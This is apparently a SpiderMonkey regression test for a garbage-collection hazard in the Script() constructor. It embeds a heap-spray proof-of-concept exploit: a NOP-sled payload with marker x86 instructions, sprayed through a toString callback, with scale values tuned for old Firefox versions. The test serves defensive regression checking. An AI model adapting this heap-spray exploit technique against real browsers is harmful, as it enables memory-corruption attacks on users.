| /* -*- indent-tabs-mode: nil; js-indent-level: 2 -*- */ |
| /* This Source Code Form is subject to the terms of the Mozilla Public |
| * License, v. 2.0. If a copy of the MPL was not distributed with this |
| * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ |
| |
| //----------------------------------------------------------------------------- |
| var BUGNUMBER = 338804; |
| var summary = 'GC hazards in constructor functions'; |
| var actual = 'No Crash'; |
| var expect = 'No Crash'; |
| |
| printBugNumber(BUGNUMBER); |
| printStatus (summary); |
| printStatus ('Uses Intel Assembly'); |
| |
| // <script> |
| // SpiderMonkey Script() GC hazard exploit |
| // |
| // scale: magic number ;-) |
| // BonEcho/2.0a2: 3000 |
| // Firefox/1.5.0.4: 2000 |
| // |
| var rooter, scale = 2000; |
| |
| exploit(); |
| /* |
| if(typeof(setTimeout) != "undefined") { |
| setTimeout(exploit, 2000); |
| } else { |
| exploit(); |
| } |
| */ |
| |
| function exploit() { |
| if (typeof Script == 'undefined') |
| { |
| print('Test skipped. Script not defined.'); |
| } |
| else |
| { |
| Script({ toString: fillHeap }); |
| Script({ toString: fillHeap }); |
| } |
| } |
| |
| function createPayload() { |
| var result = "\u9090", i; |
| for(i = 0; i < 9; i++) { |
| result += result; |
| } |
| /* mov eax, 0xdeadfeed; mov ebx, eax; mov ecx, eax; mov edx, eax; int3 */ |
| result += "\uEDB8\uADFE\u89DE\u89C3\u89C1\uCCC2"; |
| return result; |
| } |
| |
| function fillHeap() { |
| rooter = []; |
| var payload = createPayload(), block = "", s2 = scale * 2, i; |
| for(i = 0; i < scale; i++) { |
| rooter[i] = block = block + payload; |
| } |
| for(; i < s2; i++) { |
| rooter[i] = payload + i; |
| } |
| return ""; |
| } |
| |
| // </script> |
| |
| reportCompare(expect, actual, summary); |